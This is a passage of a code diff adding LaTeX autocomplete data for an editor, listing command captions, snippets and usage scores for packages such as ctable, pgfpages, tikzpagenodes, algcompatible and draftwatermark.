'\\rotatebox{$1}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'ctable-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'ctable-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'ctable-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'ctable-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'ctable-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'ctable-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'ctable-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'ctable-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'ctable-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'ctable-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'ctable-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'ctable-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'ctable-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'ctable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'ctable-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ctable-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'ctable-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'ctable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'ctable-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'ctable-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'ctable-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'ctable-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'ctable-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'ctable-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'ctable-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'ctable-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'ctable-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'ctable-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'ctable-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ctable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'ctable-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'ctable-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'ctable-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'ctable-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'ctable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'ctable-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'ctable-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'ctable-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'ctable-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'ctable-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'ctable-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'ctable-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ctable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'ctable-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'ctable-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'ctable-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'ctable-cmd', + score: 0.2864294797053033, + }, + ], + bbding: [ + { + caption: '\\HandRight', + snippet: '\\HandRight', + meta: 'bbding-cmd', + score: 9.986169155719329e-5, + }, + { + caption: '\\XSolidBrush', + snippet: '\\XSolidBrush', + meta: 'bbding-cmd', + score: 0.0003502234425563509, + }, + { + caption: '\\Checkmark', + snippet: '\\Checkmark', + meta: 'bbding-cmd', + score: 0.0010506703276690528, + }, + ], + endfloat: [ + { + caption: '\\DeclareDelayedFloatFlavor{}{}', + snippet: '\\DeclareDelayedFloatFlavor{$1}{$2}', + meta: 'endfloat-cmd', + score: 0.00012872796177294446, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'endfloat-cmd', + score: 0.00037306820619479756, + }, + ], + centernot: [ + { + caption: '\\centernot', + snippet: '\\centernot', + meta: 'centernot-cmd', + score: 0.0002513707969474898, + }, + ], + tikzpagenodes: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpagenodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpagenodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpagenodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikzpagenodes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikzpagenodes-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpagenodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpagenodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikzpagenodes-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpagenodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\checkoddpage', + snippet: '\\checkoddpage', + meta: 'tikzpagenodes-cmd', + score: 0.00028672585452906425, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzpagenodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzpagenodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzpagenodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikzpagenodes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikzpagenodes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikzpagenodes-cmd', + score: 0.2864294797053033, + }, + ], + xargs: [ + { + caption: '\\newcommandx{}[][]{}', + snippet: '\\newcommandx{$1}[$2][$3]{$4}', + meta: 'xargs-cmd', + score: 0.0001110821063389004, + }, + ], + morefloats: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'morefloats-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'morefloats-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'morefloats-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'morefloats-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'morefloats-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'morefloats-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'morefloats-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'morefloats-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'morefloats-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'morefloats-cmd', + score: 0.021170869458413965, + }, + ], + background: [ + { + caption: '\\BgThispage', + snippet: '\\BgThispage', + meta: 'background-cmd', + score: 0.0003956357273698423, + }, + { + caption: '\\backgroundsetup{}', + snippet: '\\backgroundsetup{$1}', + meta: 'background-cmd', + score: 0.0004910777123492879, + }, + ], + bibunits: [ + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'bibunits-cmd', + score: 0.2659628337907604, + }, + ], + moresize: [ + { + caption: '\\Huge', + snippet: '\\Huge', + meta: 'moresize-cmd', + score: 0.04725806985998919, + }, + ], + pgfpages: [ + { + caption: '\\pgfpagesphysicalpageoptions{}', + snippet: '\\pgfpagesphysicalpageoptions{$1}', + meta: 'pgfpages-cmd', + score: 0.00045967325420052095, + }, + { + caption: '\\pgfpageslogicalpageoptions{}{}', + snippet: '\\pgfpageslogicalpageoptions{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.00045967325420052095, + }, + { + caption: '\\pgfpageoptionborder{}', + snippet: '\\pgfpageoptionborder{$1}', + meta: 'pgfpages-cmd', + score: 0.0009193465084010419, + }, + { + caption: '\\pgfpageoptionborder', + snippet: '\\pgfpageoptionborder', + meta: 'pgfpages-cmd', + score: 0.0009193465084010419, + }, + { + caption: '\\pgfpagesdeclarelayout{}{}{}', + snippet: '\\pgfpagesdeclarelayout{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.00045967325420052095, + }, + { + caption: '\\pgfpagesuselayout{}', + snippet: '\\pgfpagesuselayout{$1}', + meta: 'pgfpages-cmd', + score: 0.0006090132461062934, + }, + { + caption: '\\pgfpagesuselayout{}[]', + snippet: '\\pgfpagesuselayout{$1}[$2]', + meta: 'pgfpages-cmd', + score: 0.0006090132461062934, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'pgfpages-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'pgfpages-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'pgfpages-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfpages-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfpages-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfpages-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfpages-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfpages-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfpages-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfpages-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfpages-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfpages-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfpages-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfpages-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfpages-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfpages-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfpages-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfpages-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfpages-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfpages-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfpages-cmd', + score: 0.2864294797053033, + }, + ], + ctex: [ + { + caption: '\\CTeX', + snippet: '\\CTeX', + meta: 'ctex-cmd', + score: 0.0005884706823906032, + }, + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'ctex-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'ctex-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'ctex-cmd', + score: 0.2864294797053033, + }, + ], + algcompatible: [ + { + caption: '\\algrenewcommand', + snippet: '\\algrenewcommand', + meta: 'algcompatible-cmd', + score: 0.0019861803661869416, + }, + { + caption: '\\Statex', + snippet: '\\Statex', + meta: 'algcompatible-cmd', + score: 0.008622777195102994, + }, + { + caption: '\\BState{}', + snippet: '\\BState{$1}', + meta: 'algcompatible-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\BState', + snippet: '\\BState', + meta: 'algcompatible-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\algloopdefx{}[][]{}', + snippet: '\\algloopdefx{$1}[$2][$3]{$4}', + meta: 'algcompatible-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algnewcommand', + snippet: '\\algnewcommand', + meta: 'algcompatible-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\algnewcommand{}[]{}', + snippet: '\\algnewcommand{$1}[$2]{$3}', + meta: 'algcompatible-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\Comment{}', + snippet: '\\Comment{$1}', + meta: 'algcompatible-cmd', + score: 0.005178604573219454, + }, + { + caption: '\\algblockdefx{}{}[]', + snippet: '\\algblockdefx{$1}{$2}[$3]', + meta: 'algcompatible-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algrenewtext{}{}', + snippet: '\\algrenewtext{$1}{$2}', + meta: 'algcompatible-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algrenewtext{}[]{}', + snippet: '\\algrenewtext{$1}[$2]{$3}', + meta: 'algcompatible-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algblock{}{}', + snippet: '\\algblock{$1}{$2}', + meta: 'algcompatible-cmd', + score: 0.0007916858220314837, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algcompatible-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\algdef{}[]{}{}{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'algcompatible-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}{}[]{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}[$5]{$6}{$7}', + meta: 'algcompatible-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}[]{}', + snippet: '\\algdef{$1}[$2]{$3}[$4]{$5}', + meta: 'algcompatible-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algtext{}', + snippet: '\\algtext{$1}', + meta: 'algcompatible-cmd', + score: 0.0005463612015579842, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algcompatible-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algcompatible-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algcompatible-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algcompatible-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algcompatible-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algcompatible-cmd', + score: 0.0018957469739775527, + }, + ], + draftwatermark: [ + { + caption: '\\SetWatermarkScale{}', + snippet: '\\SetWatermarkScale{$1}', + meta: 'draftwatermark-cmd', + score: 0.0013776850432469145, + }, + { + caption: '\\SetWatermarkText{}', + snippet: '\\SetWatermarkText{$1}', + meta: 'draftwatermark-cmd', + score: 0.0017209596079747669, + }, + { + caption: '\\SetWatermarkColor[]{}', + snippet: '\\SetWatermarkColor[$1]{$2}', + meta: 'draftwatermark-cmd', + score: 0.0007061648188687239, + }, + { + caption: '\\SetWatermarkFontSize{}', + snippet: '\\SetWatermarkFontSize{$1}', + meta: 'draftwatermark-cmd', + score: 0.0005747853176838451, + }, + { + caption: '\\SetWatermarkLightness{}', + snippet: '\\SetWatermarkLightness{$1}', + meta: 'draftwatermark-cmd', + score: 0.0005747853176838451, + }, + { + caption: '\\SetWatermarkAngle{}', + snippet: '\\SetWatermarkAngle{$1}', + meta: 'draftwatermark-cmd', + score: 0.0005747853176838451, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'draftwatermark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'draftwatermark-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'draftwatermark-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 